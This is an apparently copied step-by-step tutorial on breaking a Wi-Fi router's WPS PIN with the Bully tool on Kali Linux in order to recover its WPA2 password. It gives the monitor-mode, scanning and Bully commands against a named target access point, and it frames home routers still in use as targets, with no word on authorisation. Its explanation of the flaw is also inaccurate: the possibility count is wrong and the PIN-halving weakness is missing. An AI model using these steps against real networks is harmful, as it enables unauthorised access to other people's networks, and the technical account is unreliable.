>WIFI_HACKING_
Breaking WPS PIN w/ BuLLy
![reading gif](https://media.giphy.com/media/kHK6zyGyZ6rzW/giphy.gif)
WPS stands for Wi-Fi Protected Setup and was designed to make setting a secure AP simpler for
the average homeowner. First introduced
in 2006, by 2011 it was discovered that it had a serious design flaw. The WPS PIN could be
brute-forced rather simply.
With only 7 unknown digits in the PIN, there are just 9,999,999 possibilities, and most systems
can attempt that many combinations in
a few hours. Once the WPS PIN is discovered, the user can use that PIN to find the WPA2
preshared key (password). Since a brute-force
attack against a WPA2 protected AP can take hours to days, if this feature is enabled on the AP
and not upgraded, it can be a much
faster route to getting the PSK.
It's important to note, though, that new APs no longer have this vulnerability. This attack will
only work on APs sold during that
window of 2006 and early 2012. Since many families keep their APs for many years,
there are still many of these vulnerable ones around.
*For this to work, we'll need to use a compatible wireless network adapter*
- Step 1: Fire Up Kali -
Let's start by firing our favorite hacking Linux distribution, Kali. Then open a terminal that looks like this:
![backtrack screenshot](https://img.wonderhowto.com/img/64/21/63553116487064/0/hack-wi-fi-breaking-wps-pin-get-password-with-bully.w1456.jpg)
> iwconfig
![backtrack screenshot](https://img.wonderhowto.com/img/76/10/63553116587767/0/hack-wi-fi-breaking-wps-pin-get-password-with-bully.w1456.jpg)
- Step 2: Put Your WiFi Adpater in Monitor Mode -
The next step is to put your Wi-Fi adapter in monitor mode. This is similar to promiscuous mode on a wired connection. In other words, it enables us to see all the packets passing through the air past our wireless adapter. We can use one of the tools from the Aircrack-ng suite, Airmon-ng, to accomplish this task.
> airmon-ng start wlan0
![backtrack screenshot](https://img.wonderhowto.com/img/60/28/63553116649111/0/hack-wi-fi-breaking-wps-pin-get-password-with-bully.w1456.jpg)
> airodump-ng mon0
![backtrack screenshot](https://img.wonderhowto.com/img/27/78/63553116708080/0/hack-wi-fi-breaking-wps-pin-get-password-with-bully.w1456.jpg)
- Step 3: Use airodump-ng to get necessary Info -
Finally, all we need to do is to put this info into our Bully command.
> bully mon0 -b 00:25:9C:97:4F:48 -e Mandela2 -c 9
Let's break down that command to see what's happening.
- mon0 is the name of the wireless adapter in monitor mode.
- --b 00:25:9C:97:4F:48 is the BSSID of the vulnerable AP.
- -e Mandela2 is the SSID of the AP.
- -c 9 is the channel the AP is broadcasting on.
All of this information is available in the screen above with Airodump-ng.
![backtrack screenshot](https://img.wonderhowto.com/img/37/72/63553116820033/0/hack-wi-fi-breaking-wps-pin-get-password-with-bully.w1456.jpg)
- Step 4: Start Bully -
When we hit enter, Bully will start to try to crack the WPS PIN.
![backtrack screenshot](https://img.wonderhowto.com/img/42/11/63553116830205/0/hack-wi-fi-breaking-wps-pin-get-password-with-bully.w1456.jpg)